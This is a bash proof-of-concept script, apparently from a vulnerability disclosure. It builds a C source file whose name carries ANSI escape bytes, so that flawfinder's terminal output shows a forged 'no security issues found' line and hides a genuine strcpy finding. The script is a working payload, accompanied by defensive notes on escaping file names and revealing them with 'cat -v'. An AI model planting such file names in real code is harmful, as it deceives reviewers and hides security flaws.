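#!/usr/bin/env bash
# POC: Terminal-escape sequence injection via attacker-controlled filenames
# Target: flawfinder 2.0.19, mate-terminal (libvte) on Parrot OS.
#
# A developer who clones a hostile source tree and runs `flawfinder .`
# sees forged / hidden hits; the PoC relies on the scanner writing the file
# name, control bytes included, straight to the terminal. Luckily, there is
# NO code execution on mate-terminal, as VTE filters dangerous sequences.
# The most likely impact is visual deception of a developer reviewing scan
# output.
#
# Defensive notes:
#   - The fix belongs in the tool: reported names should be escaped
#     (cat -v style) before being written to a terminal.
#   - Reviewers can expose such names with `ls -1 | cat -v` (or GNU `ls -b`),
#     or by piping the scanner's output through `cat -v`.
#
# Usage:
#   bash poc.sh                      # builds the tree in a fresh mktemp -d dir
#   POC_DIR=/some/dir bash poc.sh    # or in an explicit directory
# Then cd into the printed directory and run:
#   flawfinder .
# Cleanup: rm -rf -- <printed directory>
set -euo pipefail

# Build in a fresh, unpredictable directory unless the caller names one.
# A fixed /tmp path combined with `rm -rf` is an avoidable race in a shared
# /tmp, so nothing is deleted here; the caller cleans up afterwards.
POC_DIR="${POC_DIR:-$(mktemp -d "${TMPDIR:-/tmp}/ff-poc.XXXXXX")}"
mkdir -p -- "$POC_DIR"
cd -- "$POC_DIR"

# Bytes embedded in the filename.
ESC=$'\x1b'
CR=$'\r'

# ---------------------------------------------------------------------------
# Payload A:
# Contains the necessary ANSI bytes to control terminal output.
# Obviously, changing the text "[OK] flawfinder: no security issues found"
# will alter what the terminal outputs.
# ---------------------------------------------------------------------------
PAYLOAD_A="${ESC}[0m${CR}${ESC}[2K${ESC}[32m[OK] flawfinder: no security issues found${ESC}[0m${ESC}[8m"
# Filename must end in a recognized C extension so flawfinder will scan it.
FNAME_A="${PAYLOAD_A}genuine.c"

# Store some code that flawfinder would generally find problems with.
# Quoted heredoc delimiter: the C source is written literally, no expansion.
cat > "$FNAME_A" <<'EOF'
#include <string.h>
void f(char *s) {
char buf[8];
strcpy(buf, s); /* genuine flawfinder level-4 hit */
}
EOF

# printf rather than echo: the directory path is data, not a format string.
printf '\nPOC tree built at: %s\n' "$POC_DIR"
printf 'Files (showing literal control bytes with cat -v):\n'
ls -1 | cat -v
# %q shell-quotes the path so the printed command is safe to copy and paste.
printf '\nNow run: cd %q && flawfinder .\n\n' "$POC_DIR"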